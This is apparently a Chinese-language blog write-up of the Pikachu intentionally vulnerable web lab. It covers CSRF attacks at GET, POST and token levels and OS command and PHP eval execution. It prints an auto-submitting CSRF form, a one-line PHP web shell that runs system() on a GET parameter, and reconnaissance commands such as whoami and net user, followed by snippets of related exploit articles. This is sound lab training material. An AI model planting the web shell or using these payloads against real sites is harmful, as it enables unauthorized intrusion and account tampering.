Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞
Pikachu CSRF GET/POST/TOKE级别漏洞实战&&Pikachu exec “ping” && exec “evel”&&OS命令执行漏洞
CSRF(get) login
tips(再点一下关闭)这里一共有这么些用户vince/allen/kobe/grady/kevin/lucy/lili,密码全部是123456
先抓包
修改个个人信息看看
直接在burpsuite里改add为hackerhah
CSRF(POST)
这里使用别人写的script,放到pikachu-master/ vul/csrf上,代码如下
当提交方式是post时
和xss的post型攻击差不多,攻击者构造一个自己的攻击站点,当lucy点击时,就会向服务器提交post修改个人信息
<html>
<head>
<script>
window.onload = function() {document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpos/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="girl" /><input id="phonenum" type="text" name="phonenum" value="12345678922" /><input id="add" type="text" name="add" value="hacker" /><input id="email" type="text" name="email" value="lucy@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
不知道上面原因一点击提交就会跳到http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_get_login.php里面,虽然post.html里面写的是
http://192.168.21.10/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php
CSRF Token login
查看源代码:
抓包,看到有token参数。
token:随机码,每次请求,都增加一个随机码,后台每次对这个随机码进行验证
与前面比较,这里多了一个Token,如果后台对提交的Token进行了验证,由于Token是随机的,我们就无法伪造URL了
看下控制台源码,看下这个表单,每次点击修改个人信息 都会去访问 token_get_edit_.php 这个文件,这个文件就会生成一个token,
value就是后端发过来的,type是隐藏的额,在前端看不到,但是在源码中能看到。
每次点提交,token也会被提交到后台,后台会对token进行验证,如果和当前session里面的token相等,才会让你提交。
OS命令执行漏洞:
Ipconfig ifconfig
Whoami
Net user
index2.php
<?php
$action = $_GET['cmd'];
echo "<pre>";
echo system($action);
echo "</pre>";
?>
Pikachu exec “ping” && exec "evel"
Pikachu exec "ping"
远程命令执行,我们直接输入: 127.0.0.1我们发现出现了乱码
- 同时按"win + R" ,并输入 regedit 进入注册表
- 找到 HKEY_CURRENT_USER\Console%SystemRoot%_system32_cmd.exe,如果该项下已存在 CodePage 项,则把值改为十进制 “65001”,点击确定即可;如果不存在,在该项下新建一个 DWORD(32位值),命名为 “CodePage”,值设为 “65001”。然后关闭注册表管理器。
然后再重新输入命令查看结果:
exec “eval”:
后台会执行响应的 php 代码,我们可以输入下面的代码:phpinfo();
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
Pikachu CSRF GET/POST/TOKE级别漏洞实战Pikachu exec “ping“ exec “evel“OS命令执行漏洞相关推荐
- php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析
1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...
- 漏洞情报 | 锐捷RSR路由器设备存在命令执行漏洞
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 2021年4月14日,360漏洞云监测到锐捷网络官方通告了锐捷网络RSR路由器系列产品的Web管理存在命令执行漏洞(CNVD-2021 ...
- Goby漏洞更新 | 斐讯 FIR302B management.cgi 远程命令执行漏洞 (CVE-2022-27373)
漏洞名称:斐讯 FIR302B management.cgi 远程命令执行漏洞 (CVE-2022-27373) English Name:PHICOMM FIR302B management.cgi ...
- DVWA——命令执行漏洞学习
前言:命令执行和代码执行也是web安全中常见的一种漏洞,这次就先来学习一下命令执行漏洞. Command Execution 一.简介 由于开发人员在编写源代码时,没有对源代码中可执行的特殊函数入口做 ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 命令执行——命令执行漏洞及(四)
普及DVWA中的命令执行漏洞并通过源码分析深入了解命令执行漏洞 DVWA介绍 点我查看搭建方法 DVWA(Damn Vulnerable Web Application) 平台: >用来进行安全 ...
- jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
- 深信服行为感知命令执行漏洞
深信服行为感知命令执行漏洞 1.深信服行为感知漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构建漏洞URL 1.3.2.1.查询IP地址 1.3.2.2 ...
- 闲人的命令执行漏洞基础学习1
命令执行漏洞是指攻击者可以随意执行系统命令. 在window和Linux系统下: && & || |符号可以作为命令连接符使用. 如ping url && ne ...
最新文章
- java中this_多学习才能多赚钱之:java中this什么用
- 仿小黄车android定位,小黄车ofo是怎么实现自行车定位功能的?
- android透明状态栏刘海屏,Android 修改dialog状态栏颜色兼容刘海屏
- 马云马斯克激辩:AI 是威胁还是被低估了?
- element ui 表格中的渲染有多个状态判断的情况
- java 流 改变编码_JAVA IO流中字符串编码不一致问题
- pip install -r requirements.txt 报错。
- c盘python27文件夹可以删除嘛_c盘哪些目录可以删除
- 你不知道网络安全有多严峻
- VSCode 上面的菜单栏不见了,该怎么办
- mac os操作系统如何降级
- Excel多条件计数——COUNTIFS【获奖情况统计】
- 中科院计算机软件所导师,中国科学院软件研究所硕士生导师刘立祥
- 谷歌浏览器查看版本信息及个人资料路径的命令方法
- 开始使用MarkDown
- 爬取猫眼电影top100
- 鸿网互联远程端口修改工具( 无需要重启,系统防火墙自动放行远程端口)
- 智力竞赛抢答器 Verilog HDL 建模
- 4.1界面显示信息的插件设置
- day two daydayup
热门文章
- 安装TIA博途V14 SP1后,打开软件时系统提示出现一个并行的错误_解决办法
- 一文速学数模-时序预测模型(四)二次指数平滑法和三次指数平滑法详解+Python代码实现
- CIC滤波器和FPGA实现
- Win10移动热点无法打开,手机无法连接电脑热点
- 微信小程序nodejs+vue课程推荐报名学习分享平台uniapp
- php指纹登录原理,指纹识别的工作原理-理论方法-敏捷大拇指-一个敢保留真话的IT精英社区...
- 【自然语言处理】【数据增强】PromDA:应用于低资源NLU任务的、基于prompt的数据增强方法
- 数据分析与AI(五)pandas的数据拼接操作/美国各州人口分析/苹果历年股票曲线图
- 领导“驭人9术”,厚黑但实用,掌握了,不管什么下属都能摆平
- Windows 11 Server 2022 HLK kit WHQL认证注意事项